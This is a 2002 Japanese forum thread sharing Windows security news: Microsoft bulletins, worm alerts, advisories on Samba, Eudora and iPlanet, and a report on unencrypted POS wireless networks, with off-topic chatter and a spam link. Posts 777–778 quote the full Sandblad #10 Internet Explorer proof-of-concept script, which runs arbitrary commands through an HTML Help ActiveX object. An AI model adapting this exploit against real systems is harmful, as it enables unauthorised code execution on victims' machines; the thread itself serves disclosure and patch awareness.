722むむむ ◆MUMUMUkopk :02/10/31 15:48 ID:???
■Windows2000のルートフォルダのデフォルト設定が不適切、
設定変更呼びかけ(MS02-064)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-064ov.asp

MS02-064 に関する情報
「MS02-064: Windows 2000 の既定のアクセス権により、
トロイの木馬プログラムが実行される (Q327522)」に関する要約情報です。
セキュリティ情報の概要と回避策の情報をご案内いたします。

概要
====
この問題は、下記対象となる製品の既定のアクセス権により、悪意のある
ユーザーによりトロイの木馬などの不正なプログラムが実行される可能性が
あります。

対象となる製品
==============
・ Microsoft Windows 2000
723むむむ ◆MUMUMUkopk :02/10/31 15:48 ID:???
>>722

修正プログラム
==============
この問題に対処する修正プログラムの提供はございません。 この問題は、
管理者により適切な設定を行うことで対処されます。 システムドライブの
ルートディレクトリのアクセス権を以下のように設定することで、
ベースラインセキュリティを確保することができます。
Administrators:
フル コントロール (このフォルダ、サブフォルダおよびファイル)
Creators Owners:
フル コントロール (サブフォルダとファイルのみ)
System:
フル コントロール (このフォルダ、サブフォルダおよびファイル)
Everyone:
読み取りと実行 (このフォルダのみ)
724むむむ ◆MUMUMUkopk :02/10/31 15:49 ID:???
>>722-723
しかし、すごいなこれ、、、。
725むむむ ◆MUMUMUkopk :02/10/31 15:59 ID:???
■Windows XPのPPTP(VPN)にDoS攻撃可能な脆弱性(MS02-063)

MS02-063 は現在英語版パッチのみリリース。以下英語版より引用。

Microsoft Security Bulletin MS02-063

Unchecked Buffer in PPTP Implementation Could Enable Denial of Service
Attacks (Q329834)
Originally posted: October 30, 2002

Summary
Who should read this bulletin: Customers using MicrosoftR WindowsR 2000
or Windows XP.

Maximum Severity Rating: Critical.

Recommendation: Administrators offering PPTP services should install
the patch immediately; users who utilize remote access using PPTP should
consider installing the patch.



726むむむ ◆MUMUMUkopk :02/10/31 16:00 ID:???
727むむむ ◆MUMUMUkopk :02/10/31 16:18 ID:???
>>725-726
日本語ありました。ちなみに【高】レベル。Win2kもだめ。

http://www.microsoft.com/japan/technet/security/bulletin/ms02-063.asp より引用。

PPTP サービスの未チェックのバッファにより、サービス拒否の攻撃を受ける
(Q329834) (MS02-063)

登録日 : 2002/10/31
更新日 : 2002/10/31

概要 :
このセキュリティ情報の対象となるユーザー : MicrosoftR Windows 2000 または
Windows XP を使用しているお客様

脆弱性の影響 : サービス拒否

最大深刻度 : 高

推奨する対応策 : PPTP サービスを提供している管理者は、直ちに修正プログラムを
インストールしてください。PPTP を使用してリモート アクセスを利用しているユーザー
は修正プログラムのインストールを検討してください。

影響を受けるソフトウェア :

Microsoft Windows 2000
Microsoft Windows XP
728むむむ ◆MUMUMUkopk :02/10/31 16:19 ID:???
>>727 続き

修正プログラム :
この問題に対する日本語版修正プログラムは、次のサイトからダウンロードできます。

・Microsoft Windows 2000:
PC/AT 互換機用
http://www.microsoft.com/downloads/release.asp?ReleaseID=43611
ダウンロード先のリストから Japanese を選択してください。
NEC PC-9800 シリーズ用
http://www.microsoft.com/downloads/release.asp?ReleaseID=43612
ダウンロード先のリストから Japanese NEC を選択してください。

・Microsoft Windows XP:
32-bit: http://www.microsoft.com/downloads/release.asp?ReleaseID=43640
64-bit: http://www.microsoft.com/downloads/release.asp?ReleaseID=43633

・修正プログラムに関する追加情報 :
対象プラットフォーム :
Windows 2000 用の修正プログラムは、Windows 2000 Service Pack 2、Service
Pack 3 を実行しているシステムにインストールすることができます。
Windows XP 用の修正プログラムは、Windows XP Service Pack 1 を実行している
システムにインストールすることができます。
729むむむ ◆MUMUMUkopk :02/11/03 00:35 ID:???
 ◆01:シマンテック、パフォーマンスチューニングソフトを偽装する新型
    ワームについて警告。ファイル全削除など破壊的動作も
 >>>> http://www.rbbtoday.com/news/20021101/9249.html
730___:02/11/03 13:28 ID:???
>>724
けど、W2Kって普通にインストールすると、C:ドライブは Everyoneフルコントロールで、
下手にアクセス権設定すると、プリンター動かなくなったり、アプリを実行できなく
なったり、ろくな事が無い。って言うのが NT3.51の頃からあったと思う。
実際、今確認したら C:ドライブは Everyoneフルコントロールでした、家のパソコン。

まあいつも Administrator権限でログインしてるから、問題起きないとは思うけど
ちょっと実行するの怖いです・・
プリンター使えなくなるぐらいなら良いけど、下手に間違えたら、起動しなくなりそう・・
731名無しさん@お腹いっぱい。:02/11/03 15:35 ID:???
そういえばEveryoneを削除したらSpeedDiskが実行できなくなったな。
732むむむ ◆MUMUMUkopk :02/11/05 15:48 ID:???
>>730
うちのマシン(主に奥様が使用)を変えてみました。
いくつか問題出て直したけど、その後は概ね大丈夫みたい。
733名無しさん@お腹いっぱい。:02/11/06 00:40 ID:???
Everyoneの制限を上げたら、PCの起動に
異様に時間が掛かるようになった。
戻したら元に戻った。
だめぽ…。
734むむむ ◆MUMUMUkopk :02/11/06 02:36 ID:???
>>733
うちのは、、、特にそういう気はしないみたいだけど。
いずれにせよ your own risk にて。
735むむむ ◆MUMUMUkopk :02/11/06 02:38 ID:???
ウイルス関係を2件。

◇プレビュー感染し、FUNLOVEを作り出すウイルス
http://bb.watch.impress.co.jp/cda/news/20.html

■『Klez』もどきの新メールウイルス、『Braid』
http://japan.cnet.com/Enterprise/News/2002/Item/021105-2.html?me
大量に電子メールを送付する最新のコンピューター・ウイルス
『W32.Braid』(別名『PE.Brid』)が見つかった。拡大のペースは遅いよ
うだが、広く被害をもたらした『Klez』ウイルスと同じ手口を使うという。
736名無しさん@お腹いっぱい。:02/11/06 02:51 ID:???
システムドライブのルートディレクトリってC:\のこと?
それとも%systemroot%のこと?
737273:02/11/06 03:46 ID:ErgCklGx
折れはここの使ってる。安いし、結構女ウケいいからお勧め!
http://www.adultshoping.net/linkstaff.cgi?id=001951
738名無しさん@お腹いっぱい。:02/11/06 08:44 ID:+ai03aZ7
質問したいことが...fusianasanって名前のところに書き込むとどうなるの?
739navgw.tenri-u.ac.jp:02/11/06 09:46 ID:Qzax/P+Z
>>738
この通り、素敵になれる。
740名無しさん@お腹いっぱい。:02/11/06 15:01 ID:???
>>739
ac.jpかよ!
741名無しさん@お腹いっぱい。:02/11/07 02:00 ID:???
npa.go.jpとかだったらもっとイヤだが。
742名無しさん@お腹いっぱい。:02/11/07 07:56 ID:???
743名無しさん@お腹いっぱい。:02/11/08 08:12 ID:???
保守
744むむむ ◆MUMUMUkopk :02/11/08 11:21 ID:???
■Mozilla 1.0に6つのセキュリティホール、うち1つはMozilla 1.0.1/1.1にも影響

オープンソース閲覧ソフトウェア『Mozilla』の初期バージョンに6つのセキュリティ
ホールがあり、同ソフトウェアを使っているパソコンは攻撃に弱くなっている
可能性がある。

問題となっているのは、AOL-Time Warner's (NYSE:AOL) の Netscape 部門が
支援する Mozilla プロジェクトから出されたプレバージョン 1.0 だ。

これらバグは、今週 BugTraq のセキュリティリストに掲載されていもので、その
ほとんどは Mozilla の最新バージョンでは既に修正されている。しかし、少なくとも
そのうちの1つは、今もバージョン 1.0.1 と 1.1 に影響を与えている。(Mozilla の
最新リリースのダウンロードはここから)。
(以上、2002年11月8日のjapan.internet.comより一部引用―全文は引用元を参照)

引用元: http://japan.internet.com/webtech/20021107/11.html


745 :02/11/08 11:34 ID:???
746名無しさん@お腹いっぱい。:02/11/08 11:42 ID:vwgKVcm/
>>739さん、で、晒されるとなんか不都合あるんですか?
747人権保護団体:02/11/08 13:35 ID:???

【 男性のお客様はこちらのフロアではお食事できません――。 】

 神戸市にあるマクドナルド三宮センター街店に8月、「女性専用フロア」ができた。
全国に約3800店あるマクドナルドで初の試み。女性客の評判は、「とても静かで
くつろげる」(15歳高校生)、「男性の目を気にせず気軽に食事できる」(20歳大学生)
と上々だ。

記事:http://b2o.nikkei.co.jp/contents/news10/morning/20021107e3mi03t707.cfm

( ´D`)ノ< 昔アメリカでは黒人が入ってはいけないお店があったそうれすが、
        これはそれとどこが違うのれしょうか?
        黒人差別ならぬ男性差別が日本の水面下でジワジワと進んでいます。

        女性専用 ピンと来たら要注意です。
748名無しさん@お腹いっぱい。:02/11/08 14:35 ID:???
>>747
おれは「静か?何ねむたいこと抜かしてんのじゃ!
男がいたらうるさいみたいに言うてるけど
女のほうがよっぽど騒々しいやんけボゲェ!」
なので、こんな奴は隔離していいよ。
749むむむ ◆MUMUMUkopk :02/11/09 19:06 ID:???
■破壊的なウィルス「Roron」に注意、ファイル共有ソフトなどを経由して感染

 ロシアのKasperskyLabsとフィンランドのF-Secureは6日、「Roron」という新たな
コンピューターウィルスへの注意を喚起し始めた。きわめて破壊的な特徴を持ったウ
ィルスでブルガリアで作成されたとみられている。

 Roronはメールの添付ファイル、LAN、ファイル共有サービス「KaZaA」の三つの経
路を通して感染してゆく。いずれの場合もユーザーがファイルを自発的に実行しない
限り感染することはないが、メールの添付ファイルも、KaZaAで共有されるファイル
名もそれぞれ思わせぶりなファイル名がついてるため、何気なく実行してしまうこと
がないよう注意する必要がある。

 コンピューターが感染するとinboxフォルダにあるすべてのアドレスに対して自分
自身を添付して外部にメールを送信するほか、ネットワーク共有を探して共有できる
コンピューターに自分自身をコピーする。また、KaZaAのファイル共有フォルダを発
見するとそこに自分自身のコピーを作り、他のKaZaAユーザーがRoronウィルスをダウ
ンロードするように仕向ける。
(以上、2002年11月7日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/internet/www/article/2002/1107/roron.htm
750むむむ ◆MUMUMUkopk :02/11/09 19:09 ID:???
■セキュリティー対策ソフトのウィンドウを無効化し削除を行なう「Oror」ウイルス

 シマンテック株式会社は、受信トレイなどで発見したメールアドレス全てに自分
自身を送信するウィルス「W32.HLLW.Oror.B@mm(以下、Oror)」を感染力“高”と
して警告した。被害状況は数十台ながらも、ダメージは“中”となっている。

 Ororは、大量メール送信ワーム型のウィルスで、感染後に受信トレイやWindowsの
アドレス帳にあるメールアドレス全てに自分自身を送信する点が特徴だ。メール
経由での感染以外に、mIRCやネットワーク共有、マッピングドライブを介しても感染を
広げるため感染力が高い。
(中略)
 実際にOrorに感染すると、まず偽のエラーメッセージを表示し、Windowsフォルダー
にランダムなファイル名を使って自分自身をコピーする。また、レジストリーを改変
してWindows起動時に毎回自分自身が起動するように変更する。続いて、「mcafee」
や「shield」など、セキュリティー関連ソフトと思われる文字列を含むウィンドウを全て
閉じる。さらに、「norton and virus」や「black and ice」などの文字列を含むフォルダー
やサブフォルダーを削除する。これらのセキュリティー関連ソフト対策を行なった上
で、取得したメールアドレス全てに自分自身を送信したり、ネットワーク共有や
マッピングドライブに自分自身をコピーするなど、巧妙な作りとなっている。
(以上、2002年11月8日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/internet/www/article/2002/1108/oror.htm
751名無しさん@お腹いっぱい。:02/11/10 00:38 ID:???
752むむむ ◆MUMUMUkopk :02/11/12 04:05 ID:???
■URLをクリックさせて感染させるウイルス「FRIENDGRT」

 株式会社トレンドマイクロは、メール本文中に記載されているURLをクリック
すると、ワームプログラムがインストールされるウィルス「WORM_FRIENDGRT.B
(以下、FRIENDGRT)」を警告した。日本での感染数はまだ少ないものの、米国
では3日間で600件以上の感染が発生している。

 FRIENDGRTは、10月24日頃登場したウィルス「WORM_FRIENDGRT.A」の亜種と
なる。このウィルスは、送信されてきたメールの本文中に記載されているURLを
受信者自らクリックすることによって感染する形態となっている。このような形態を
とっているため、通常のウィルスメールと異なり、メールに添付ファイルが存在
しないので注意が必要だ。感染すると、Microsoft Outlookのリストにある全ての
宛先に、ウィルスをダウンロードさせるURLが記載されたメールを送信する。
(以上、2002年11月12日のInternet Watchより一部引用―全文は引用元を参照)

引用元: http://www.watch.impress.co.jp/internet/www/article/2002/1111/friend.htm

むやみやたらに何でもクリックするのは危険ということで。
753名無しさん@お腹いっぱい。:02/11/12 09:18 ID:???
>>752
エロサイトのようにアクチブXでインストールさせようとするんですかいね。
しかしそれだとサイトはとんでもないアクセス過多になって速攻でつぶれてそう・・・。
754むむむ ◆MUMUMUkopk :02/11/13 04:25 ID:???
ちょっと古いけど、やばそうなので。

Windows+IEで任意のコマンドを任意のパラメータで実行する方法
http://homepage2.nifty.com/m_kamada/di200211.htm#08
755名無しさん@お腹いっぱい。:02/11/13 07:56 ID:???
マイコンピュータゾーンってなんぞやーと思ったらデフォルトでは操作できないのですね…
(((゚Д゚)))ガクガクブルブル
http://homepage2.nifty.com/m_kamada/javascript/ietest7.htm
http://support.microsoft.com/default.aspx?scid=kb;ja;JP415353
> HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Flags
>   0x00000021(33) → 0x00000001(1)
>
> このレジストリの操作をおこなうと、インターネットオプションのセキュリティタブのところに
> 「マイコンピュータ」が出てきます。
「規定値に戻す」が無いみたいなのでとりあえず「ダイアログを表示する」だけ
変更してみますた。
756名無しさん@お腹いっぱい。:02/11/13 19:56 ID:???
Win2k+IE5.01+パッチ全てでやってみましたけど
この環境では再現しないみたいですね。
757名無しさん@お腹いっぱい。:02/11/14 08:32 ID:???
保守
758名無しさん@お腹いっぱい。:02/11/19 12:31 ID:???
保守
759むむむ ◆MUMUMUkopk :02/11/19 21:53 ID:???
■OSのプロダクトキーなどをメールで送信するワーム「ブライドA」

 シマンテックは18日、新種のワーム「W32.Brid.A@mm(ブライドA、別名Braid
など)」の被害報告が増えていることから、ユーザーに警戒を呼びかけた。ブラ
イドAは自分自身のコピー添付に加え、感染者のユーザ名、会社名、OS関連情報
(バージョン、ID、プロダクトキー)などの情報を本文や件名として送信する。
(以上、2002年11月19日の毎日インタラクティブより一部引用―全文は引用元を参照)

引用元: http://www.mainichi.co.jp/digital/network/archive/200211/18/9.html
760Seisei_Yamaguchi:02/11/19 22:43 ID:6Rq/yP2x
片山さんのチマチマ発言が皿されてるスレわどこですか?
761名無しさん@お腹いっぱい。:02/11/20 02:06 ID:???
Office2000のSP3がでたことについては誰も触れてない・・よな?

http://www.microsoft.com/japan/technet/treeview/default.asp?url=/japan/technet/security/news/off2ksp3.asp

ちまちましたアップデートをほっといても
こういう形でちゃんと集大成が出るんですな。
OS同様Officeも2000はまだ面倒見てくれるらしい。
762むむむ ◆MUMUMUkopk :02/11/20 02:37 ID:???
>>761
おお、今書こうと思ってたら、、、。乙です。
763むむむ ◆MUMUMUkopk :02/11/20 13:58 ID:???
■EudoraのScript実行に脆弱性、情報漏洩の可能性

http://www.idefense.com/advisory/11.19.02b.txt (英語)

上記より一部引用:

>Remote exploitation of a weakness in Eudora could allow for the potential
>retrieval of sensitive information from a targeted Eudora user's computer.
>...
>VIII. DISCLOSURE TIMELINE
>(中略)
>11/19/2002 Still no reply for vendor clarification of response
>11/19/2002Public disclosure

ということで、現時点で対応はされていない模様。
たぶん日本語版のEudoraもやばいと思われ。
764むむむ ◆MUMUMUkopk :02/11/20 14:02 ID:???
■iPlanet WebServer 4.* に複数の脆弱性、リモートから権限を奪われる可能性も

http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0078.html

上記より引用:
>Find an exploit for this vulnerability at:
> http://www.ngsec.com/ngresearch/ngadvisories/

ということで既にExploitコードが公開。
対応策は、

>Avoid iPlanet's Admin Server usage, until Sun releases a patch for
>these vulnerabilities. Alternatively upgrade to iPlanet v.6.*

とのこと。
765むむむ ◆MUMUMUkopk :02/11/20 14:22 ID:???
■Netscape 4.x に脆弱性、リモートからユーザ情報を奪われる可能性

http://archives.neohapsis.com/archives/vulnwatch/2002-q4/0081.html (英語)

Preferences ファイル経由で情報を奪われる可能性がある模様。
Netscape 6.x にはこの脆弱性はなし、とのこと。
766名無しさん@お腹いっぱい。:02/11/20 15:17 ID:hcRo8hbF
64.231.64.7X HSE-Toronto-ppp303305.sympatico.ca

人のパソコンに勝手にアクセス掛けてくる ワンノブザ ばか
767むむむ ◆MUMUMUkopk :02/11/21 07:04 ID:???
■zlibの脆弱性に対応したSun Java VMがリリース

>>69 のバグが Sun の Java VM にあったとのことで、(ようやく)パッチバージョンが
リリースされたようです。Windows版も出ました。

3. Latest Releases
Windows Production Releases
SDK and JRE 1.4.1_01 http://java.sun.com/j2se/1.4/
SDK and JRE 1.4.0_03 http://java.sun.com/j2se/1.4/
SDK and JRE 1.3.1_06 http://java.sun.com/j2se/1.3/
SDK and JRE 1.2.2_014 http://java.sun.com/j2se/1.2/

とのことで JRE を 1.4.1_01 に更新する必要ありかと。

http://java.sun.com/j2se/1.4/

情報元: http://sunsolve.sun.com/pub-cgi/retrieve.pl?doctype=coll&doc=secbull/220&type=0&nav=sec.sba
768むむむ ◆MUMUMUkopk :02/11/21 09:53 ID:???
■IEに新たな6つの脆弱性、パッチの適用を(MS02-066)

最新情報は以下のサイトでご確認ください。
http://www.microsoft.com/japan/technet/security/bulletin/ms02-066ov.asp

MS02-066 に関する情報
「MS02-066: Internet Explorer 用の累積的な修正プログラム (Q328970)」に
関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。

概要
====
この修正プログラムは、Internet Explorer に影響を及ぼすセキュリティ上の
問題を排除する累積的な修正プログラムです。
以前に公開された MS02-047 : Internet Explorer 用の累積的な
修正プログラム (Q323759) で修正された問題に加えて、新たに 6 つの問題を
排除します。

対象となる製品
==============
・ Internet Explorer 6、6 Service Pack 1
・ Internet Explorer 5.5 Service Pack 2
・ Internet Explorer 5.01 Service Pack 3 for Windows 2000
注意: Internet Explorer 5.01 Service Pack 3 の修正プログラムは、
Windows 2000 環境にのみ適用可能です。

(続く)
769むむむ ◆MUMUMUkopk :02/11/21 09:55 ID:???
770むむむ ◆MUMUMUkopk :02/11/21 09:55 ID:???
>>769 続き

詳細
====
この修正プログラムをインストールすることにより、
悪意のあるユーザーによる以下の攻撃を防ぐことができます。

(重要) 不正な PNG 形式のイメージ ファイルの処理に含まれる脆弱性を悪用し
バッファのオーバーラン攻撃が行われる可能性がある問題です。
(警告) URL エンコードの文字処理に含まれる脆弱性を悪用し、個人情報が
漏えいする可能性がある問題です。
(重要) フレームおよびフレーム タグを処理に含まれるクロスサイト
スクリプティング (CSS) の脆弱性を悪用し、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。
(注意) オブジェクト タグの処理に含まれる脆弱性を悪用し、スクリプトを
ローカルコンピュータゾーンで実行される可能性がある問題です。
(重要) Web ページで特定のプログラミング技術を使用している場合、
クロスドメインの脆弱性を悪用し、ユーザーのローカルファイルを
読み取られる可能性がある問題です。さらに、攻撃者は
ローカル システムにすでに存在している実行可能ファイルを呼び出す
可能性があります。
(重要) 上記のもう一つの問題によりクロスドメインの脆弱性を悪用し、
ユーザーのローカルファイルを読み取られる、または、
ローカル システムにすでに存在している実行可能ファイルを
呼び出す可能性があります。
771むむむ ◆MUMUMUkopk :02/11/21 10:10 ID:???
MS02-065の件もここにアップしたいですが、今時間とれないので後ほど。
とりあえずURLだけ。

http://www.microsoft.com/japan/technet/security/bulletin/ms02-065ov.asp

MS02-065 に関する情報
「MS02-065: Microsoft Data Access Components のバッファ オーバーラン
により、コードが実行される (Q329414)」に関する要約情報です。
セキュリティ情報の概要と修正プログラムの情報をご案内いたします。
772窓板住人:02/11/21 11:19 ID:???
概要
====
この問題は、Microsoft Data Access Components (MDAC) に含まれる
Remote Data Services (RDS) コンポーネントでの文字列の処理に含まれる
未チェックのバッファにより、不正なプログラムが実行される可能性が
あります。

対象となる製品
==============
・Microsoft Data Access Components (MDAC) 2.1
・Microsoft Data Access Components (MDAC) 2.5
・Microsoft Data Access Components (MDAC) 2.6
・Internet Explorer 5.01
・Internet Explorer 5.5
・Internet Explorer 6

以下の OS を利用しているユーザーは修正プログラムをインストールする
必要があります。
・Windows 98
・Windows 98 Second Edition
・Windows Millennium Edition
・Windows NT4.0
・Windows 2000

MDAC 2.7 および Windows XP はこの問題の影響を受けません。
MDAC のバージョンの確認方法については次の技術情報をご覧ください。

JP301202 [HOW TO] MDAC のバージョンを確認する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;JP301202

773窓板住人:02/11/21 11:20 ID:???
修正プログラム
==============
・Microsoft Data Access Components (MDAC)
http://download.microsoft.com/download/dasdk/Patch/Q329414/W98NT42KMe/EN-US/q329414_mdacall_x86.exe

詳細
====
この修正プログラムをインストールすることにより、悪意のあるユーザー
による以下の攻撃を防ぐことができます。
(緊急) RDS の文字列の処理に存在する脆弱性を悪用し、バッファの
オーバーラン攻撃が行われる問題です。
対策が行われていないシステムがインターネットなどのネットワークを通じて
他のコンピュータと接続している場合、この問題を悪用した攻撃を受ける
ことがあります。この攻撃は、受動的攻撃という悪意のあるユーザーから
送られた HTML 形式の電子メールからも攻撃を受ける可能性があります。
この攻撃は、ハッカーまたはクラッカーと呼ばれる悪意のあるユーザーや、
ワームといった自動的な攻撃を目的とした悪意のあるプログラムから行われる
ことがあります。

この MDAC の脆弱性を悪用されることにより、Internet Explorer や
Internet Information Services (IIS) に、以下のような実害を受ける事が
考えられます。

Internet Explorer に想定する実害
・意図しないアプリケーションが動作させられる可能性があります。
その結果、ワームの感染、データの削除、トロイの木馬の実行などが
考えられます。

Internet Informaiton Services (IIS) に想定する被害(略)
774むむむ ◆MUMUMUkopk :02/11/21 13:34 ID:???
>>772-773
おつでした。
775名無しさん@お腹いっぱい。:02/11/21 22:14 ID:???
>>767
1.4.1_01に限っては結構前から出てたよ。
776名無しさん@お腹いっぱい。:02/11/21 22:55 ID:???
MDAC 2.7も相当前から出てた。
777 :02/11/22 00:36 ID:???
http://archives.neohapsis.com/archives/bugtraq/2002-11/0041.html
http://sec.greymagic.com/adv/gm012-ie/
http://archives.neohapsis.com/archives/bugtraq/2002-11/0047.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0114.html
http://archives.neohapsis.com/archives/bugtraq/2002-11/0126.html
--------------------------- CUT HERE ---------------------------
<*script>
// "How to execute programs with parameters in IE", 2002-11-06
// Sandblad advisory #10, Andreas Sandblad, [email protected]
prog = 'cmd';
args = '/k echo You are vulnerable (Sandblad #10) & '+
'echo Sandblad #10 > c:/vulnerable.txt & winmine';


778777:02/11/22 00:38 ID:???
if (!location.hash) {
showHelp(location+"#1");
showHelp("iexplore.chm");
blur();
}
else if (location.hash == "#1")
open(location+"2").blur();
else {
f = opener.location.assign;
opener.location="res:";
f("javascript:location.replace('mk:@MSITStore:C:')");
setTimeout('run()',1000);
}
function run() {
f("javascript:document.write('<object id=c1 classid=clsid:adb"+
"880a6-d8ff-11cf-9377-00aa003b7a11><param name=Command value"+
"=ShortCut><param name=Item1 value=\","+prog+","+args+"\"></"+
"object><object id=c2 classid=clsid:adb880a6-d8ff-11cf-9377"+
"-00aa003b7a11><param name=Command value=Close></object>')");
f("javascript:c1.Click();c2.Click();");
close();
}
</script>
--------------------------- CUT HERE ---------------------------
779名無しさん@お腹いっぱい。:02/11/22 01:28 ID:???
<title>Y!ニュース−IEとOLのセキュリティ− </title>
>http://dailynews.yahoo.co.jp/fc/computer/ie_outlook/

久々ヤフーに笑わされました。
”OLのセキュリティ”って・・・。
780名無しさん@お腹いっぱい。:02/11/22 02:31 ID:???
>>775
リンクが無いしダウンロードのリストにも無いけど、1.41_03というのが
対策版になる予定の物なんだろうか。
781むむむ ◆MUMUMUkopk :02/11/22 03:43 ID:???
■samba-2.2.7リリース、セキュリティホールの修正を含む

厳密にはWindowsではないですが、一応。

http://samba.org/
ftp://ftp.samba.org/pub/samba/samba-2.2.7.tar.gz

添付ドキュメントより抜粋:

IMPORTANT: Security bugfix for Samba
------------------------------------
Summary
-------
A security hole has been discovered in versions 2.2.2 through 2.2.6
of Samba that could potentially allow an attacker to gain root access
on the target machine. The word "potentially" is used because there
is no known exploit of this bug, and the Samba Team has not been able to
craft one ourselves. However, the seriousness of the problem warrants
this immediate 2.2.7 release.

In addition to addressing this security issue, Samba 2.2.7 also includes
thirteen unrelated improvements. These improvements result from our
process of continuous quality assurance and code review, and are part of
the Samba team's committment to excellence.
782名無しさん@お腹いっぱい。:02/11/22 04:21 ID:???
>>780
情報元の 2. Affected Releases
ここに書いてあるバージョンまでが
影響を受けるらしい。

今ダウンロードできるの入れとけばいいんじゃない?
783名無しさん@お腹いっぱい。:02/11/22 12:56 ID:mUJc76WV

★MSのデータベース・アクセス機能に重大なセキュリティ・ホール★

http://biztech.nikkeibp.co.jp/wcs/j/comp/218286

極めて深刻 なセキュリティ・ホールであり、該当するシステムも広範にわたるため、速やかな対策が必要である。

784フセフオ、キ、オ、ェハ「、、、テ、ム、、。」:02/11/22 15:58 ID:mUJc76WV
785むむむ ◆MUMUMUkopk :02/11/22 16:24 ID:???
>>783-784
>>771-773 にて既出すね。
786名無しさん@お腹いっぱい。:02/11/23 02:57 ID:???
windowsupdateかけたらHDDがいきなりブー言った。すげぇ驚いた。
今はなんとも無いようだが、電源落とすのが怖い。
787名無しさん@お腹いっぱい。:02/11/24 14:43 ID:dyrkKapX
セキュリティとは直接関係ないかもしれませんが、Win98SEをクリーンインストールし
WindowsUpdateしようとしても「更新するものないよ」という状態になってます。
お手上げ。
788名無しさん@お腹いっぱい。:02/11/24 15:16 ID:???
>>787
面倒だけど、自分で拾って取っておくのが一番確実
789名無しさん@お腹いっぱい。:02/11/24 15:33 ID:???
>>787
http://www.microsoft.com/japan/enable/products/security/
既に知ってたらアレだけど、ここで拾うといいよ。
790名無しさん@お腹いっぱい。:02/11/24 15:48 ID:Jjtx7RSN
791名無しさん@お腹いっぱい。:02/11/24 15:50 ID:???
IEのSP1いれたぞい
792名無しさん@お腹いっぱい。:02/11/24 18:44 ID:???
JP21-0721 : Internet Explorer を最小化するとBGMが音痴になる
http://combatechizenya.tripod.co.jp/onchi.htm
793名無しさん@お腹いっぱい。:02/11/24 20:45 ID:???
>>792
烈しくワラタ
794名無しさん@お腹いっぱい。:02/11/24 21:52 ID:???
JP4110000: IE の中止ボタンがしいたけに見えて困る
http://w3j.org/nazokb/jp4110000.html
795名無しさん@お腹いっぱい。:02/11/26 16:02 ID:WX2TiNlE
穴だらけIE
なんとかしてちょ
796■■■ ■■■ ■■■:02/11/27 03:58 ID:???
ここまで読んだ
797名無しさん@お腹いっぱい。:02/11/27 10:26 ID:yqr5TjD3
>>783
MDACのパッチを当てても、当たったかどうかの確認方法がかかれていません・・。
本当に、適用されているのかなぁ。

どなたか、ごぞんじないですか?
798名無しさん@お腹いっぱい。:02/11/27 23:41 ID:???
今日、久しぶりにMSからメールが来たが
相変わらずHTML形式じゃん・・・
やる気あるのか?
799むむむ ◆MUMUMUkopk :02/11/28 01:30 ID:???
///////////////////////////////////////////////////////////////////////
SNS Spiffy Reviews No.4
個人情報漏洩の可能性のある脆弱性
百貨店等で使用されている POS 機器の例

Problem first discovered: Tue, 17 Sep 2002
Problem Published: Wed, 27 Nov 2002
///////////////////////////////////////////////////////////////////////

問題の概要:
===========
 百貨店等で使用されている無線 LAN 対応 POS 機器の設定によって個人情報
 が漏洩する危険性があります。
 我々の調査したいくつかの百貨店等の中で、WEP の設定がされていない POS
 機器があり、クレジットカード情報や購入商品情報などが漏洩する可能性が
 あります。

問題の詳細:
===========
 1.アクセスポイントの大量導入
  ある百貨店内で大量のアクセスポイントを検知し、検知された基地局の
  SSID と導入されているアクセスポイント機器に貼り付けられている名称
  が一致していることを確認しました。

 2.WEP による暗号化が行われていない
  調査した百貨店に導入されている無線 LAN 環境では WEP キーが設定され
  ていませんでした。従って、無線 LAN 対応 POS 機器の通信は WEP による
  暗号化が行われていないと推測されます。クレジットカード番号や購入商
  品情報などの個人情報が平文で通信されている可能性があります。
  ただし、通信の傍受は行っていませんので、個人情報漏洩の事実は確認し
  ていません。
800むむむ ◆MUMUMUkopk :02/11/28 01:31 ID:???
>>799 続き

 3.使用場所を推測可能な SSID の使用
  調査した百貨店に導入されているアクセスポイントには、使用場所を推測
  可能な SSID を使用しているものがありました。
  どの店舗のデータであるか容易に特定されてしまう可能性があり、また、
  データを取得したいという動機にもなると思われます。

対策:
=====
 無線 LAN 対応 POS 機器において WEP による暗号化を行うことが対策です。
 しかし、調査した百貨店で使用されていた無線 LAN 対応 POS メーカに、
 WEP機能設定が可能か問い合わせを行いましたが、1 ヶ月以上経過して現在
 も回答が得られませんでした。

 問題の大きさから考えて、該当する百貨店等の名称や、無線 LAN 対応 POS
 メーカの名称は公開しないこととします。

発見者:
=======
酒井美貴 (LAC)
801むむむ ◆MUMUMUkopk :02/11/28 01:31 ID:???
>>800 続き

免責:
=====
 このアドバイザリで示される情報は予告なしに改定されることがあり、かつ、
 あるがままの形で提供されます。この情報を適用し生起される結果のリスクは
 利用者が負うものとし、株式会社ラックは一切の責任を負わないものとします。

再配布について:
===============
このレポートの再配布は、下記条件を満たす限り自由です。

・発行元 URL として、以下の URL を明記する。
<http://www.lac.co.jp/security/intelligence/SNSSpiffy/4.html>
802むむむ ◆MUMUMUkopk :02/11/28 01:32 ID:???
>>799-801 は Windows に限った話ではありませんが、
社会的影響が大きいと判断し、あえて掲載することとしました。
803むむむ ◆MUMUMUkopk :02/11/28 03:28 ID:???
RealPlayer Buffer Overrun Vulnerability
http://service.real.com/help/faq/security/bufferoverrun_player.html

# ちょっと情報古くてスマソ。
804窓板住人:02/11/28 10:53 ID:???
パッチを無効にされる恐れあり,Windowsの深刻なセキュリティ・ホールを解説する
クライアントもサーバーも影響を受ける,IEの使用禁止も要検討
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20021126/1/

MDACとIEのセキュホはやっかいなことになってきますた
805窓板住人:02/11/28 10:55 ID:???
多数のDNSサーバに弱点
Vulnerability Note VU#457875
Various DNS service implementations generate multiple
simultaneous queries for the same resource record
http://www.kb.cert.org/vuls/id/457875
806窓板住人:02/11/28 10:56 ID:???
あんまりセキュリティホール的話じゃないけど

ポート 1720 が攻撃されると NetMeeting で受信接続が拒否される
